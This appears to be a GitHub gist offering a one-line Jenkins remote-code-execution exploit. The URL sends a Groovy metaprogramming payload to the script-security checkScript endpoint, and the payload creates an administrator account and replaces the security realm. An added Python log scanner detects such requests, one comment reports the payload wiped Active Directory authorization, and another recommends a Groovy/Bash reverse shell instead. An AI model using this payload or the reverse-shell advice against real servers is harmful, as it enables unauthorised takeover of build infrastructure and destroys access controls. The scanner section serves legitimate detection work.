Jenkins Metaprogramming RCE Create new user
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}
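
A defender-side check for the request above, as an added example that is not part of the original gist: it scans reverse-proxy access logs for calls to this `checkScript` endpoint whose decoded `value` contains a class declaration or the security-configuration calls seen in the payload. The combined log format, the function names and the sample log lines are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoint path from the gist (script-security form validation for SecureGroovyScript).
ENDPOINT = re.compile(r"/descriptorByName/[^/]*SecureGroovyScript/checkScript", re.I)
# Identifiers from the gist's payload that rewrite Jenkins' security configuration.
CONFIG_CHANGE = ("HudsonPrivateSecurityRealm", "createAccount", "setSecurityRealm",
                 "setAuthorizationStrategy", "Jenkins.ADMINISTER")
# The gist wraps its code in a class constructor, so a class declaration is a signal too.
CLASS_DECL = re.compile(r"\bclass\s+\w+\s*\{")
# Assumed log format: Apache/nginx "combined" from a reverse proxy in front of Jenkins.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Constructed sample lines (documentation IPs, shortened non-working script values).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2020:10:00:00 +0000] "GET /descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=class+x%7Bx()%7Bdef+r=new+HudsonPrivateSecurityRealm(false);r.createAccount(%22u%22,%22p%22)%7D%7D HTTP/1.1" 200 30',
    '198.51.100.4 - - [01/Jan/2020:10:01:00 +0000] "GET /descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=println+1 HTTP/1.1" 200 30',
    '198.51.100.4 - - [01/Jan/2020:10:02:00 +0000] "GET /job/build/lastBuild/ HTTP/1.1" 200 512',
]

def query_param(query, name):
    """Decode one parameter; split on '&' only, because the script value contains ';'."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(value))
    return "\n".join(values)

def inspect_line(line):
    """Return a finding for any request to the checkScript endpoint, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    if not ENDPOINT.search(parts.path):
        return None
    script = query_param(parts.query, "value")
    reasons = ["class-declaration"] if CLASS_DECL.search(script) else []
    reasons += [s for s in CONFIG_CHANGE if s in script]
    return {"client": client, "status": int(status), "reasons": reasons}

def scan(lines):
    """Findings whose script value carries at least one indicator."""
    return [f for f in map(inspect_line, lines) if f and f["reasons"]]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only GET requests expose the script in the query string; for a POST to the same path `inspect_line` still returns a finding, with an empty reason list, so every hit on this endpoint deserves a look. A match is a cue to compare the instance's security realm and authorization strategy against the expected configuration, which the comments below report being replaced.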

@ilatypov commented Aug 1, 2019

In addition to creating a privileged account, this disabled Active Directory authentication and destroyed the role-based configuration for Active Directory groups vs. Jenkins folders.


@gquere commented Aug 8, 2019

This will work but will also absolutely trash the whole security configuration! Use with caution!
If applicable, prefer the use of a Groovy/Bash reverse shell.
